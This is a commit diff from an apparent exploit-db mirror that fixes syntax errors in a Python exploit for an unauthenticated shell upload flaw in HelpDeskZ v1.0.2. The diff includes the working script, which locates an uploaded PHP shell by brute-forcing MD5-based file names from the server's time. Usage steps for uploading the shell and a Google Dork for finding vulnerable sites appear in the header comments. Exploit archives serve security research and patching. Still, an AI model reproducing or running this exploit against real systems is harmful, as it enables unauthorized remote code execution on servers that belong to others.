bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Fix:(exploits/php/webapps/40300.py):Fix some SyntaxErrors

Browse source
This commit is contained in:
196Ikuchil 2020-05-16 18:43:33 +09:00
parent a5ffe5baef
commit 5a407e5d37
1 changed files with 11 additions and 12 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

23
exploits/php/webapps/40300.py
View file

@ -10,7 +10,7 @@
# Software Link httpsgithub.comevolutionscriptHelpDeskZ-1.0archivemaster.zip # Software Link httpsgithub.comevolutionscriptHelpDeskZ-1.0archivemaster.zip
# Version = v1.0.2 # Version = v1.0.2
# Tested on # Tested on
# CVE # CVE
HelpDeskZ = v1.0.2 suffers from an unauthenticated shell upload vulnerability. HelpDeskZ = v1.0.2 suffers from an unauthenticated shell upload vulnerability.
@ -39,8 +39,8 @@ import datetime
print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit' print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
if len(sys.argv) 3 if len(sys.argv) < 3:
print Usage {} [baseUrl] [nameOfUploadedFile].format(sys.argv[0]) print "Usage {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
sys.exit(1) sys.exit(1)
helpdeskzBaseUrl = sys.argv[1] helpdeskzBaseUrl = sys.argv[1]
@ -50,21 +50,20 @@ fileName = sys.argv[2]
r = requests.get(helpdeskzBaseUrl) r = requests.get(helpdeskzBaseUrl)
#Gets the current time of the server to prevent timezone errors - DoctorEww #Gets the current time of the server to prevent timezone errors - DoctorEww
currentTime = int((datetime.datetime.strptime(r.headers['date'], %a, %d %b %Y %H%M%S %Z) - datetime.datetime(1970,1,1)).total_seconds()) currentTime = int((datetime.datetime.strptime(r.headers['date'], '%a, %d %b %Y %H:%M:%S %Z') - datetime.datetime(1970,1,1)).total_seconds())
for x in range(0, 300) for x in range(0, 300):
plaintext = fileName + str(currentTime - x) plaintext = fileName + str(currentTime - x)
md5hash = hashlib.md5(plaintext).hexdigest() md5hash = hashlib.md5(plaintext).hexdigest()
url = helpdeskzBaseUrl+md5hash+'.php' url = helpdeskzBaseUrl+md5hash+'.php'
response = requests.head(url) response = requests.head(url)
if response.status_code == 200 if response.status_code == 200:
print found! print 'found!'
print url print url
sys.exit(0) sys.exit(0)
print Sorry, I did not find anything print 'Sorry, I did not find anything'
''' '''
# Exploit Title: HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload # Exploit Title: HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
# Google Dork: intext:"Help Desk Software by HelpDeskZ" # Google Dork: intext:"Help Desk Software by HelpDeskZ"
@ -93,8 +92,8 @@ Enter anything in the mandatory fields, attach your phpshell.php, solve the capt
Call this script with the base url of your HelpdeskZ-Installation and the name of the file you uploaded: Call this script with the base url of your HelpdeskZ-Installation and the name of the file you uploaded:
exploit.py http://localhost/helpdeskz/ phpshell.php exploit.py http://localhost/helpdeskz/ phpshell.php
import hashlib import hashlib
import time import time
import sys import sys
@ -123,4 +122,4 @@ for x in range(0, 300):
sys.exit(0) sys.exit(0)
print "Sorry, I did not find anything" print "Sorry, I did not find anything"
''' '''